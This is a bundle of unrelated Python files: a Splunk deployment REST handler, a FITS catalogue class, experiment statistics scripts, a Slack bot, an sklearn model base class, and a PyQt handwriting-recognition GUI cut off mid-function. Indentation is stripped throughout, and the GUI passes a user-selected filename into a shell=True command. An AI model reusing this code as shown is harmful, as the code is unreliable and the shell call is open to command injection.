for name in r.deployment_param_names:
value = self.get_param(name)
if value is not None:
d.set_param(name, value)
changed_value = True
if changed_value:
d.trigger_deploying()
class DeploymentsHandler(BaseRestHandler):
def handle_GET(self):
algorithm_name = self.get_param("algorithm")
environment_name = self.get_param("environment")
if environment_name and algorithm_name:
deployments = [get(self.splunk, algorithm_name, environment_name)]
if algorithm_name:
deployments = get_all_for_algorithm(self.splunk, algorithm_name)
else:
deployments = get_all(self.splunk)
results = []
for deployment in deployments:
results.append({
"algorithm": deployment.algorithm_name,
"environment": deployment.environment_name,
"status": deployment.status,
"status_message": deployment.status_message,
"editable": deployment.editable,
"editor_url": deployment.editor_url,
"disabled": deployment.is_disabled,
"restart_required": deployment.restart_required,
})
self.send_entries(results)
def handle_POST(self):
algorithm_name = self.get_param("algorithm")
environment_name = self.get_param("environment")
if not algorithm_name:
raise Exception("missing algorithm")
if not environment_name:
raise Exception("missing environment")
a = algorithm.get(self.splunk, algorithm_name)
e = environment.get(self.splunk, environment_name)
enable_schedule = self.get_param("enable_schedule")
if enable_schedule:
enable_schedule = is_truthy(enable_schedule)
else:
enable_schedule = None
deployment_params = {}
for name in a.runtime.deployment_param_names:
value = self.get_param(name)
if value is not None:
deployment_params[name] = value
create(
self.splunk,
a.name,
e.name,
enable_schedule=enable_schedule,
params=deployment_params,
)
def handle_PUT(self):
enable_schedule = self.get_param("enable_schedule")
if enable_schedule is not None:
enable_schedule = is_truthy(enable_schedule)
algorithm_name = self.get_param("algorithm")
if not algorithm_name:
raise Exception("algorithm missing")
environment_name = self.get_param("environment")
if not environment_name:
raise Exception("environment missing")
d = deployment.get(self.splunk, algorithm_name, environment_name)
restart_required = self.get_param("restart_required")
if restart_required is not None:
d.restart_required = is_truthy(restart_required)
editable = self.get_param("editable")
if editable is not None:
d.editable = is_truthy(editable)
is_disabled = self.get_param("disabled")
if is_disabled is not None:
d.is_disabled = is_truthy(is_disabled)
d.trigger_deploying(
enable_schedule=enable_schedule,
)
def handle_DELETE(self):
query = self.request['query']
algorithm_name = query.get("algorithm", "")
if not algorithm_name:
raise Exception("missing algorithm")
environment_name = query.get("environment", "")
if not environment_name:
raise Exception("missing environment")
d = get(self.splunk, algorithm_name, environment_name)
if not d:
self.response.setStatus(404)
return
payload = self.request["query"]
enable_schedule = query.get("enable_schedule", "")
if enable_schedule:
enable_schedule = is_truthy(enable_schedule)
else:
enable_schedule = None
delete(self.splunk, d, enable_schedule=enable_schedule)
# def handle_POST(self):
# deployment = self.get_deployment_from_path()
# if not deployment:
# self.response.setStatus(404)
# return
# payload = parse_qs(self.request['payload'])
# if "disabled" in payload:
# disabled = payload["disabled"][0]
# deployment.is_disabled = disabled
# if "editable" in payload:
# editable = payload["editable"][0]
# deployment.editable = editable
# if "restart_required" in payload:
# restart_required = payload["restart_required"][0]
# deployment.restart_required = restart_required
# if "enable_schedule" in payload:
# enable_schedule = is_truthy(payload["enable_schedule"][0])
# else:
# enable_schedule = None
# prefix = "param."
# params = {}
# for key, value in payload.items():
# if key.startswith(prefix):
# name = key[len(prefix):]
# if len(value) == 0:
# continue
# params[name] = value[0]
# deployment.update_params(params)
# trigger(
# self.splunk,
# deployment,
# status=status.STATUS_DEPLOYING,
# enable_schedule=enable_schedule,
# )
|
"""
Python class for handling object catalogs associated with
a data release. The catalogs are obtained from FITS files.
This class does some caching for speed.
"""
import numpy
from ..utils import fits
from ..utils import filehandler
from ..utils.columnstore import ColumnStore
from ..utils.npyquery import Column as ColumnBase
try:
basestring
except NameError:
basestring = str
__author__ = "<NAME> and <NAME>"
__version__ = "1.0"
__email__ = "<EMAIL> or <EMAIL>"
class C(ColumnBase):
""" `C` provides a shorthand for querying the catalogue
with the :py:mod:`imaginglss.utils.npyquery` mini language
"""
def visit(self, catalogue):
# Rows
return catalogue[self.name]
def coord2xyz(coord):
"""
Given coord=(RA,DEC) returns unit vectors, nhat. A helper function.
Parameters
----------
coord : array_like
coord = (RA, DEC) in degrees.
Returns
-------
vector : array_like
Unit vectors corresponding to RA, DEC, in (, 3).
"""
RA, DEC = coord
xyz = numpy.empty(len(RA), ('f4', 3))
c = numpy.cos(DEC / 180. * numpy.pi)
xyz[:, 0] = c * numpy.sin(RA / 180. * numpy.pi)
xyz[:, 1] = c * numpy.cos(RA / 180. * numpy.pi)
xyz[:, 2] = numpy.sin(DEC / 180. * numpy.pi)
return xyz.T
def uppercase_dtype(dtype):
""" Convert a dtype to upper case. A helper function.
Do not use.
"""
pairs = dict([(key.upper(), dtype.fields[key]) for key in dtype.names])
dtype = numpy.dtype(pairs)
return dtype
def subdtype(dtype, columns):
try:
return numpy.dtype([(key, dtype[key]) for key in columns])
except KeyError as e:
raise KeyError("%s : candidates are %s." %
(str(e), str(sorted(dtype.names))))
def native_dtype(dtype):
""" Convert a dtype to native dtype. A helper function.
Do not use.
"""
return dtype.newbyteorder('=')
class CacheExpired(RuntimeError):
pass
class TransformedColumn(object):
def __init__(self, ref, columns, transform):
if not isinstance(columns, (tuple, list)):
columns = [columns]
self.ref = ref
self.columns = columns
self.transform = transform
def __getitem__(self, index):
args = tuple([ self.ref[c][index]
for c in self.columns])
return self.transform(*args)
class Catalogue(object):
"""
Parameters
----------
bricks: list
a list of bricks names that the catalogue covers.
format_filename : function
a function converts a brick object to a filename of the tractor
catalogue
aliases : list
a list of fields to transform; this is to support migration
of schema from older data release to newer ones. The list
is of from (oldname, newname, transformfunction)
Attributes
----------
dtype : dtype
A container of the data type of columns
in :py:class:`numpy.dtype`
"""
def __init__(self, bricks, format_filename, aliases, columns):
filenames = [ format_filename(brick) for brick in bricks]
bricknames = [ brick.name for brick in bricks]
self.filenames = dict(zip(bricknames, filenames))
self.aliases = dict([(new, (old, transform))
for old, new, transform in aliases])
data = []
for brick in bricks:
data.append(self.open(brick))
self.COLUMNS = columns
self.data = numpy.concatenate(data)
@property
def size(self):
return len(self.data)
def __len__(self):
return len(self.data)
@property
def dtype(self):
return self.data.dtype
def open(self, brick):
data = fits.read_table(self.filenames[brick.name])
dtype = [(column, data.dtype[column]) for column in self.COLUMNS]
data_compressed = numpy.empty(shape=data.shape, dtype=dtype)
for column in self.COLUMNS:
data_compressed[column][...] = data[column]
return data_compressed
def __getitem__(self, column):
if isinstance(column, basestring) and column in self.aliases:
old, transform = self.aliases[column]
return TransformedColumn(self, old, transform)
else:
return self.data[column]
def __repr__(self):
return 'Catalogue: %s' % str(self.dtype)
class BigFileCatalogue(ColumnStore):
"""
"""
def __init__(self, cachedir, aliases):
import bigfile
self.cachedir = cachedir
with bigfile.BigFile(cachedir, create=True) as bf:
bd = bigfile.BigData(bf)
self._size = bd.size
self._dtype = bd.dtype
self.aliases = dict([(new, (old, transform))
for old, new, transform in aliases])
ColumnStore.__init__(self)
@property
def size(self):
return self._size
@property
def dtype(self):
return self._dtype
def open(self, brick):
raise RuntimeError("FIXME: currently cannot open a brick from a sweep.")
def __getitem__(self, column):
if isinstance(column, basestring) and column in self.aliases:
old, transform = self.aliases[column]
return TransformedColumn(self, old, transform)
else:
return ColumnStore.__getitem__(self, column)
def fetch(self, column, start, end):
import bigfile
with bigfile.BigFile(self.cachedir) as bf:
return bf[column][start:end]
def __repr__(self):
return 'BigFileCatalogue: %s' % str(self.dtype)
def neighbours(self, coord, sep):
pass
|
from oeda.databases import setup_experiment_database, setup_user_database, db
from oeda.analysis.factorial_tests import FactorialAnova
from oeda.analysis.analysis_execution import delete_combination_notation, iterate_anova_tables, get_tuples
from collections import OrderedDict
from oeda.utilities.Structures import DefaultOrderedDict
from scipy import stats
import pprint
import json
pp = pprint.PrettyPrinter(indent=4)
def start_workflow_with_anova(experiment_id, step_no, key, alpha, nrOfImportantFactors, executionStrategyType, performAnova=False):
stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
if performAnova:
perform_anova(experiment_id, step_no, stage_ids, samples, knobs, key)
# retrieved = db().get_analysis(experiment_id=experiment_id, step_no=step_no, analysis_name='two-way-anova')
# significant_interactions = get_significant_interactions(retrieved['anova_result'], alpha, nrOfImportantFactors)
# significant_interactions = assign_iterations(experiment, significant_interactions, executionStrategyType)
# print("ssi", significant_interactions)
def perform_anova(experiment_id, step_no, stage_ids, samples, knobs, key):
test = FactorialAnova(stage_ids=stage_ids, y_key=key, knob_keys=None, stages_count=len(stage_ids))
aov_table, aov_table_sqr = test.run(data=samples, knobs=knobs)
aov_table = delete_combination_notation(aov_table)
aov_table_sqr = delete_combination_notation(aov_table_sqr)
# type(dd) is DefaultOrderedDict
dod = iterate_anova_tables(aov_table=aov_table, aov_table_sqr=aov_table_sqr)
print("before")
print(json.dumps(dod, indent=4))
dd = OrderedDict(sorted(dod.items(), key=lambda item: (item[1]['PR(>F)'] is None, item[1]['PR(>F)'])))
print("AFTER")
print(json.dumps(dd, indent=4))
# db().save_analysis(experiment_id=experiment_id, step_no=step_no, analysis_name=test.name, anova_result=dd)
def start_workflow_with_ttest(experiment_id, key, alpha):
experiment = db().get_experiment(experiment_id)
pp.pprint(experiment)
last_step_no = experiment["numberOfSteps"]
stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=last_step_no, key=key)
pp.pprint(stage_ids)
pp.pprint(samples)
pp.pprint(knobs)
#
# test1 = Ttest(stage_ids=stage_ids, y_key=key, alpha=alpha)
# result = test1.run(data=samples, knobs=knobs)
# print(json.dumps(result, indent=4))
# db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test1.name, result=result)
def sort():
tuples = []
tuple_1 = ({"ep": 0.2, "rrs": 0.4}, 0.5555)
tuple_2 = ({"ep": 0.5, "rrs": 0.3}, 0.4444)
tuple_3 = ({"ep": 0.2222, "rrs": 0.222}, 0.8888)
tuple_4 = ({"ep": 0.3333, "rrs": 0.333}, 0.6666)
tuples.append(tuple_1)
tuples.append(tuple_2)
tuples.append(tuple_3)
tuples.append(tuple_4)
sorted_tuples = sorted(tuples, key=lambda x: x[1])
print("sorted_tuples", sorted_tuples)
print("best_knob", sorted_tuples[0][0], " best_value", sorted_tuples[0][1])
def check_normality_assumption(experiment_id, step_no, key, alpha):
stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
for sample in samples:
statistic, pvalue = stats.normaltest(sample)
if pvalue < alpha: # null hypothesis: x comes from a normal distribution
continue
else:
return False
return True
def check_homogenity_of_variance_assumption(experiment_id, step_no, key, alpha):
stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
statistic, pvalue = stats.levene(*samples)
# Levene's test of homogeneity of variance is non-significant which indicates that the groups have equal variances
if pvalue < alpha:
return False
return True
if __name__ == '__main__':
nrOfImportantFactors = 3 # to be retrieved from analysis definition
alpha = 0.05 # to be retrieved from analysis definition
setup_experiment_database("elasticsearch", "localhost", 9200)
experiment_id = "076861f3-b77b-d1a3-90c4-cc34c00712aa"
experiment = db().get_experiment(experiment_id)
pp.pprint(experiment)
ttest_step_no = experiment["numberOfSteps"]
anova_step_no = "1" # 1 denotes step-strategy phase for ANOVA, last one denotes T-test, intermediate ones denote Bayesian Opt
key = "fuelConsumption"
# test_data_points(experiment_id, step_no)
# start_workflow_with_anova(experiment_id, anova_step_no, key, alpha, nrOfImportantFactors, 'self-optimizer', True)
# start_workflow_with_ttest(experiment_id=experiment_id, key=key, alpha=alpha)
# normality = check_normality_assumption(experiment_id, anova_step_no, key, alpha)
# hom_var = check_homogenity_of_variance_assumption(experiment_id, anova_step_no, key, alpha)
# print("Normality of ANOVA", normality)
# print("Homogenity of variances ANOVA", hom_var)
#
# normality_ttest = check_normality_assumption(experiment_id, ttest_step_no, key, alpha)
# hom_var_ttest = check_homogenity_of_variance_assumption(experiment_id, ttest_step_no, key, alpha)
# print("Normality of T-test", normality_ttest)
# print("Homogenity of variances T-test", hom_var_ttest)
# asd = db().get_experiment(experiment_id=experiment_id)["numberOfSteps"]
# all_stage_data = get_all_stage_data(experiment_id=experiment_id)
# print(json.dumps(all_stage_data, indent=4))
# print(all_stage_data.keys())
# print(all_stage_data[1])
# stage_ids, stages = db().get_stages(experiment_id=experiment_id, step_no=step_no)
|
import json
import os
import time
from typing import List, Callable
from slackclient import SlackClient
from slack_bot.models import Message, Response
from slack_bot.routes import Routers, Route
RTM_READ_DELAY = int(os.getenv('RTM_READ_DELAY', 1))
class Application:
def __init__(self, token: str):
self._token = token
self._client = None
self._bot_id = None
self._routers = Routers()
@property
def bot_id(self) -> str:
if not self._bot_id:
self._bot_id = self.client.api_call("auth.test")["user_id"]
return self._bot_id
@property
def client(self) -> SlackClient:
if not self._client:
self._client = self._client_connected()
return self._client
@client.setter
def client(self, custom_client: SlackClient):
"""
For easy tests only, add mocked client
:param SlackClient custom_client: For example MagicMock()
"""
self._client = custom_client
def _client_connected(self) -> SlackClient:
sc = SlackClient(token=self._token)
if sc.rtm_connect():
return sc
raise Exception('Validate your token')
def _send(self, response: Response) -> bool:
"""
Response required attributes:
channel="C1234567890" Channel, where message wrote
text="Hello world" Text, message to response
Response optional attributes:
username="MyBotName"
as_user=True
attachments=[{"pretext": "pre-hello", "text": "text-world"}]
blocks=[{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
icon_emoji=":wink:"
icon_url="http://lorempixel.com/48/48"
link_names=True
mrkdwn=False
parse='full'
reply_broadcast=True
thread_ts='1234567890.123456'
unfurl_links=True
unfurl_media=False
More info: https://api.slack.com/methods/chat.postMessage
api_call(
method='chat.postMessage',
channel='#general',
text='try it',
username='Mario',
icon_emoji=':mario:'
)
:param Response response:
:return: bool
"""
self.client.api_call(**response.to_dict())
return True
def route(self, route, channels=None, users=None):
"""
Decorator add some bot actions if route wen equal message
Usage:
table = RoutersTable()
@table.route('hello')
def some_bot_action(request):
return Response(request=request, text='Hi!')
:param str route: target message in slack
:param list[str] channels: only for subscribe channels
:param list[str] users: only for subscribe users
"""
def wrapper(handler: Callable):
self._routers.table.add_route(route, handler, channels, users)
return handler
return wrapper
def add_routes(self, routes: List[Route]):
"""
Add handlers for all bot actions
Usage:
table = RoutersTable()
table.add_routes([
Route('hello', say_hello_handler),
Route('how do you do?', answer_handler),
])
:param list[Route] routes:
:return: list[Route]
"""
self._routers.table.add_routes(routes)
def _process_message(self, raw_msg: List[dict]) -> bool:
if not raw_msg:
return False
# parse message and find need handler
msg = Message(raw_msg)
route = self._routers.find_route(msg)
if route is None:
return False
# send response to slack
response = route.handler(msg)
if not isinstance(response, Response):
raise TypeError('Handler must be return instance Response class')
return self._send(response)
def run(self):
while True:
raw_msg = self.client.rtm_read()
print(json.dumps(raw_msg))
self._process_message(raw_msg)
# all action done
time.sleep(RTM_READ_DELAY)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 15:01:25 2019
The ModelClass parent class. All the actual
models are child classes with (if needed) overloaded methods
@author: Dr. Dr. <NAME>
@web : https://dannyvanpoucke.be
"""
import pandas as pd
import numpy as np
import sys
sys.path.append("../ParallelResults")
from TModelResults import TModelResults
from TDataPoint import TDataPoint
from sklearn.exceptions import ConvergenceWarning
class TModelClass:
"""
The parent class containing all required methods and properties.
Properties:
- nameModel : string containing the name of the model
- name : the name of this specific instance of the model
- model: the sklearn model used
- pipeline: a pipeline object containing the preprocessing
transformations (excluding the fitter function)
- target : the training target data (pandas dataframe)
- feature : the original training feature data (remains pandas, so can be recopmbined with target)
- feature_tf: the transformed features as obtained by the pipeline (this is a numpy array)
- target_test: the test target data
- feature_test: the untransformed features for testing.
- modelcoef : dictionary keeping track of all relevant model-parameters.
The values are lists with index 0 giving their print-line.
- isAverage : Boolean indicating if this is an "average" model
- hasCI : Boolean indicating if a CI was calculated for the average model
- CI : Dictionary with the CI for the parameters of the averaged model
- coefindex : integer giving the line index of coefficinet data to add in modelcoef.
- sanityThresshold : floating point thresshold parameter used in sanitychecks. [DEFAULT= 1e+9]
"""
def __init__(self, name: str, Target, Feature: pd.DataFrame,
Target_test, Feature_test: pd.DataFrame, **kwargs):
"""
Constructor of the class, initialising with a default name
It requires:
- name : the name of the object instance
- Feature : a pandas dataframe containing the features
- kwargs : a list of possible arguments provided specifically
for each child class
"""
self.nameModel='NoModelClass'
self.name=name
self.target=Target
self.feature=Feature
self.target_test=Target_test
self.feature_test=Feature_test #transformation happens only at quality assesment
self.modelcoef = dict()
self.isAverage = False
self.hasCI = False
self.CI = dict()
self.coefindex = 0 # the current line index of the modelcoef to add
self.sanityThresshold = 1.0e9
def fit(self):
"""
Class-method wrapping the fit-method of the sklearn model.
- Target : a pandas dataframe with the Target data belonging to the
Features provided upon initialisation.
"""
self.model.fit(self.feature_tf,self.target)
print("FIT COEFF=",self.model.coef_," INTERCEPT=",self.model.intercept_)
self.setCoefficients()
print("did some fitting, Parent-style:",type(self.model).__name__)
def fitSanityCheck(self):
"""
Class method which should cover/deal with failures of sklearn.
Due to the small data-sets, sklearn sometimes fails rather miserably
(even in case of a linear regression). This function should add the
"I" in AI, and try to catch and remediate the problem. This function needs to
be implemented for each model separately.
Calling this function should be performed by the user. Placing it in the
fit function of the model creates a recursive loop, which may not end well.
"""
pass #body with no content
def predict(self, Feature: pd.DataFrame) -> list:
"""
Class-method wrapping around the predict method of the sklearn-model
"""
return self.model.predict(Feature)
def predictError(self, Feature: pd.DataFrame)-> tuple:
"""
Class-method wrapping around the predict method of the sklearn-model, and
performing additional calculations needed to calculate confidence interval based
errorbars.
parameters:
Feature: the features of the data to predict
returns:
a tuple of lists: Targets, CI (every row gives the CI for 1 target, first column low, second column high)
"""
predict=self.model.predict(Feature) # although a panda goes in, an nd-array comes out
CI=np.array(list([i]*2 for i in predict)) # no errorbars yet...just placeholder
return predict, CI
#@ignore_warnings(category=ConvergenceWarning)
def CV_score(self, Target: pd.DataFrame, CV: int):
"""
Class-method wrapping the cross_val_score functionality of sklearn.
Variables:
- CV : number of folds for cross-validation
- Target : a pandas dataframe with the Target data belonging to the
Features provided upon initialisation.
"""
import warnings
from sklearn.model_selection import cross_val_score
#!!!! NOTE THAT cross_val_score PERFORMS A SET OF FITS,
#!!!! NOT TAKING THE intercept_ AND coef_ VALUES OF OUR "fit"
#!!!! AS SUCH THESE VALUES ARE OF LITTLE PRACTICAL USE AS THEY
#!!!! ARE HEAVILY DEPENDANT ON THE SUBSET. GOOD FOR A BALL-PARK GUESS...MAYBE
#catching away the warnings to keep output clean
with warnings.catch_warnings(record=True) as caught_warnings:
warnings.simplefilter("always",category=ConvergenceWarning)
mse=cross_val_score(self.model , self.feature_tf , Target,
scoring='neg_mean_squared_error',
cv = CV,
error_score = np.nan)
return mse
def setAverageCoefficients(self,EnsembleData: TModelResults, setCI: bool):
"""
Use the ensemble data to create an "average" model, and set the "coefficients"
in the current model. This should be performed in each model separately
parameters:
- EnsembleData : a TModelResults object containing the arrays with quality data and coefficients/parameters of the model for all runs
- setCI : if True, calculate the 95% confidence interval
"""
raise NotImplementedError("Please Implement this method")
def printAverageCoefficients(self, File: str=None):
"""
Print a block of information to a file, containing the averaged coefficients.
parameters:
- self:
- File: string containing a filename, if None standard output is used. Default=None
"""
raise NotImplementedError("Please Implement this method")
def setCoefficients(self):
"""
Class-method collecting and storing the fitting coefficients in the object
"""
self.modelcoef.clear() #this is the first place it should appear...clear it if approached a second time
self.coefindex=0 #correct start of indexing
self.modelcoef['header']=[self.coefindex,"--------- Model-coefficients :",self.name," ------"]
self.coefindex+=1
#actual implementation should be done in each of the child-classes
def setSanityThresshold(self, thress: float):
self.sanityThresshold=thress
def getQualityMeasures(self) -> TDataPoint:
"""
Class-method returning the quality measures of the current model.
No printing should happen here!
return:
- datapoint: a TDataPoint object containing all relevant information.
"""
from sklearn.metrics import mean_squared_error,mean_absolute_error
from sklearn.model_selection import LeaveOneOut
import numpy as np
#the training data
mean= np.mean(self.target)
std = np.std(self.target)
feature_pred = self.predict(self.feature_tf)
RMSEtrain = np.sqrt(mean_squared_error(self.target, feature_pred))
MAEtrain = mean_absolute_error(self.target, feature_pred)
#Leave-One-Out Cross-validation
LoO_CV=LeaveOneOut()
scores = np.sqrt(-self.CV_score(self.target,CV=LoO_CV)) #minus because of the NEGATIVE_MSE --> old: CV=self.feature_tf.shape[0]
trainLoO_mean=scores.mean()
trainLoO_2sig=scores.std()*2.0
#5-fold Cross-validation
scores = np.sqrt(-self.CV_score(self.target,CV=5)) #minus because of the NEGATIVE_MSE
trainCV5_mean=scores.mean()
trainCV5_2sig=scores.std()*2.0
#The test data
feature_test_tf = self.pipeline.transform(self.feature_test) #No fitting on the test-data
feature_pred_test=self.predict(feature_test_tf)
RMSEtest=np.sqrt(mean_squared_error(self.target_test, feature_pred_test))
MAEtest = mean_absolute_error(self.target_test, feature_pred_test)
#now add the reults to our model-results
datapoint=TDataPoint()
datapoint.setName(self.name)
datapoint.setNameModel(self.nameModel)
datapoint.setQuality(mean, std, RMSEtrain, MAEtrain, RMSEtest, MAEtest,
trainLoO_mean, trainLoO_2sig,
trainCV5_mean, trainCV5_2sig)
datapoint.setModelCoef(self.modelcoef)
return datapoint
|
import pandas as panda
import matplotlib.pyplot as plt
import numpy as np
import random
import sys
import matplotlib.cm as cm
import time
import matplotlib
from collections import OrderedDict
import math
from csv import writer
from csv import reader
import textwrap
from PIL import ImageTk, Image
import os
current_path = os.path.dirname(os.path.abspath(__file__))
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, QtWidgets
from textwrap3 import wrap
from PyQt5.QtGui import *
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import Qt
from subprocess import call
from subprocess import Popen, PIPE
import subprocess
import ctypes
from gtts import gTTS
from playsound import playsound
"""
Known issues:
1. K higher than 4 takes time to initialize : This is due to the implmented customized centroids initialization | Remarks: Perhaps use Kmeans++ or naive sharding to initialize centroids
2. Max K currently is 10 due to the initialized cmap and markers for plotting purposes
3. Centroid star colour hasn't been fixed
4. Centroids update not correct
"""
class MainWindow(QtWidgets.QWidget):
def __init__(self):
super(MainWindow, self).__init__()
self.initUI()
def initUI(self):
self.resize(700, 550)
self.setWindowTitle('Handwriting Recognition System')
self.center()
#self.ddl.activated[str].connect(self.onChanged_ddl(self, ))
# Create textbox (preview)
#self.textbox_trainDataset = QLineEdit(self)
#self.textbox_trainDataset.move(10, 50)
#self.textbox_trainDataset.resize(330,300)
#self.textbox_trainDataset.setFont(QFont('century', 10))
# Create label (preview)
self.label_previewImage = QLabel('', self)
self.label_previewImage.move(10, 50)
self.label_previewImage.resize(340, 300)
#self.label_previewImage.setFont(QFont('century', 12))
# Create textbox (output)
self.textbox_output = QTextEdit(self)
self.textbox_output.move(350, 50)
self.textbox_output.resize(340,300)
self.textbox_output.setFont(QFont('century', 15))
self.textbox_output.setLineWrapMode(1)
# Create label (preview)
self.label_preview = QLabel('Preview', self)
self.label_preview.move(140, 20)
self.label_preview.setFont(QFont('century', 12))
# Create label (output)
self.label_output = QLabel('Output', self)
self.label_output.move(490, 20)
self.label_output.setFont(QFont('century', 12))
# Create label (Author: <NAME>)
self.label_author = QLabel('Author: <NAME>', self)
self.label_author.move(520, 530)
self.label_author.setFont(QFont('century', 12))
# Create a button in the window (Upload)
self.button_compute = QPushButton('Upload', self)
self.button_compute.move(80,370)
self.button_compute.resize(80,30)
self.button_compute.setFont(QFont('century', 12))
# Create a button in the window (Read)
self.button_read = QPushButton('Read', self)
self.button_read.move(170,370)
self.button_read.resize(80,30)
self.button_read.setFont(QFont('century', 12))
# connect button to function on_click
self.button_compute.clicked.connect(self.on_click_browse_previewImage)
self.button_read.clicked.connect(self.on_click_read)
self.show()
def on_click_browse_previewImage(self):
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Single File', ".\\",
'*.jpg *.png') # QtCore.QDir.rootPath()
global temp
temp = fileName
pixmap = QPixmap(fileName)
scaled_pixmap = pixmap.scaled(300, 300, Qt.KeepAspectRatio, Qt.FastTransformation)
self.label_previewImage.setPixmap(scaled_pixmap)
def onChanged_ddl(self, text):
#self.ddl.setText(text)
self.ddl.setCurrentText(text)
self.ddl.setFont(QFont('century', 12))
def on_click_read(self):
try:
command = "handwriting.bat "+temp
P = subprocess.Popen(command, shell=True)
while not os.path.exists("predictedTexts.txt"):
time.sleep(1)
if os.path.exists("predictedTexts.txt"):
print("File found!")
with open('predictedTexts.txt') as f:
#DeprecationWarning
lines = np.array(f.readlines(),dtype=object)
newLines = lines[2]
newLines = newLines[8:-1]
self.textbox_output.setText(textwrap.fill(newLines, width=50))
gTTS(text=newLines, lang='en', slow=False).save("audio.mp4")
playsound(r'audio.mp4')
os.remove("predictedTexts.txt")
except:
QMessageBox.about(self, "Read error", "Please upload an image first.")
def center(self):
frameGm = self.frameGeometry()
centerPoint = QtWidgets.QDesktopWidget().availableGeometry().center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
def on_click_compute(self):
#Get value from textbox3
textboxValue_numData = self.textbox_numData.text()
textboxValue_cluster = self.textbox_cluster.text()
textboxValue_trainDataset = self.textbox_trainDataset.text()
textboxValue_testDataset = self.textbox_testDataset.text()
#Get value from dropdownlist Norm
ddlValue_Norm = self.ddl.currentText()
getCluster(self, textboxValue_cluster, textboxValue_trainDataset, textboxValue_testDataset, ddlValue_Norm, textboxValue_numData)
#self.textbox_cluster.setText("")
def getCluster(self, textboxValue_cluster, textboxValue_trainDataset, textboxValue_testDataset, ddlValue_Norm, textboxValue_numData):
#Start timer (Train)
train_start = time.time()
try:
k = int(textboxValue_cluster)
maxDataSize = int(textboxValue_numData)
except:
messageBox("Error!", "Please enter only integer for cluster and number of data!", 1)
sys.exit()
#Validation check K more than 10
if k > 10:
k = 10
messageBox("Warning!", "Only value between 1-10 is allowed for Cluster(K). Cluster(K) has been set to 10!", 1)
if k < 0:
k = 1
messageBox("Warning!", "Only value between 1-10 is allowed for Cluster(K). Cluster(K) has been set to 1!", 1)
if k >= 4 and k <= 10:
messageBox("Warning!", "K with 4 or more might take some time for centroids to initialize!", 1)
#Validation check maxDataSize more than 100
if maxDataSize > 100:
maxDataSize = 100
messageBox("Warning!", "Maximum number of data is 100. Number of data has been set to 100!", 1)
x_canvasSize, y_canvasSize = 200, 200
#QMessageBox.question(self, 'Message!', "You typed: " + str(k), QMessageBox.Ok, QMessageBox.Ok)
#Read csv file
data = panda.read_csv(textboxValue_trainDataset, header=None, usecols=[0,1,2,3])
data_temp = panda.read_csv(textboxValue_trainDataset, header=None)
w = np.array(data[0:maxDataSize][0]) #arrayWXYZ[0]
x = np.array(data[0:maxDataSize][1]) #arrayWXYZ[1]
y = np.array(data[0:maxDataSize][2]) #arrayWXYZ[2]
z = np.array(data[0:maxDataSize][3]) #arrayWXYZ[3]
arrayWXYZ = np.array(data)
#Initialize variables
centroidsW = []
centroidsX = []
centroidsY = []
centroidsZ = []
centW_new = []
centX_new = []
centY_new = []
centZ_new = []
centroids_new = []
iterations = 0
centroids_error = 1 #to proceed into loop
numP = 0
reinitializeCentroids = 1
print("Initializing centroids...Please wait...")
while(centroids_error != 0):
while(reinitializeCentroids > 0):
#conditions to enter this "if" block
# - when first entering loop
# - Initialize centroids if haven't
# - Re-intialize centroids if centroids contain Nan or 0 (ie. if initialization fails)
if reinitializeCentroids > 0:
reinitializeCentroids = 0
centroidsW = []
centroidsX = []
centroidsY = []
centroidsZ = []
centroids_new = []
iterations = 0
cWXYZ, centroidsW, centroidsX, centroidsY, centroidsZ = initializeCentroids(centroidsW, centroidsX, centroidsY, centroidsZ, w, x, y, z, k)
pointToCluster = []
averageW = np.zeros(k)
averageX = np.zeros(k)
averageY = np.zeros(k)
averageZ = np.zeros(k)
numPoints = np.zeros(k)
for i in range(len(w)): #Accumulate averages of coordinates and number of total points
if ddlValue_Norm == "L1 Norm":
dist = L1_norm(arrayWXYZ[i], cWXYZ, 1) # computes euclidean distance (L1 norm) between each data point(w,x,y,z) and k numbers of initialized centroids. Returns an array of k numbers of euclidean distance eg. [5.59642743 5.97662112 3.4525353]
elif ddlValue_Norm == "L2 Norm":
dist = L2_norm(arrayWXYZ[i], cWXYZ, 1) # computes euclidean distance (L2 norm) between each data point(w,x,y,z) and k numbers of initialized centroids. Returns an array of k numbers of euclidean distance eg. [5.59642743 5.97662112 3.4525353]
pointToCluster.append((np.argmin(dist), arrayWXYZ[i])) # gets index of computed euclidean distance with minimum/shortest value (eg. among [5.59642743 5.97662112 3.4525353]) and associated coordinates of w,x,y,z and append to array
#print("--pointToCluster-- ")
#for p in range(len(pointToCluster)):
# print("pointToCluster [{0}]: {1}".format(p, pointToCluster[p]))
averageW[np.argmin(dist)] += arrayWXYZ[i][0]
averageX[np.argmin(dist)] += arrayWXYZ[i][1]
averageY[np.argmin(dist)] += arrayWXYZ[i][2]
averageZ[np.argmin(dist)] += arrayWXYZ[i][3]
numPoints[np.argmin(dist)] += int(1)
#Validation check - Checks if centroids initialization is poor and needs reinitialization
numPts_Threshold = math.floor((100/k)/2) # parameter to ensure the minimum # of points per cluster
numPoints = numPoints.astype(int)
for y in range(k):
if numPoints[y] <= numPts_Threshold or np.sum(cWXYZ[y]) == 0:
#if np.sum(cWXYZ[y]) == 0 or isNan_cWXYZ:
reinitializeCentroids += 1
pointToCluster = np.array(pointToCluster)
print("-"*20 + " TRAIN " + "-"*20)
print("ITERATION {0}".format(iterations+1))
print("averageW: {0}".format(averageW))
print("averageX: {0}".format(averageX))
print("averageY: {0}".format(averageY))
print("averageZ: {0}".format(averageZ))
print("numPoints: {0}".format(numPoints))
print("")
numP = numPoints
centW_new, centX_new, centY_new, centZ_new = updateCentroids(averageW, averageX, averageY, averageZ, numPoints)
centroids_new = np.array(list(zip(centW_new, centX_new, centY_new, centZ_new)))
print("previous Centroids: ")
print(cWXYZ)
print("Updated Centroids: ")
print(centroids_new)
print("-"*50)
#Validation check - Centroids error
if ddlValue_Norm == "L1 Norm":
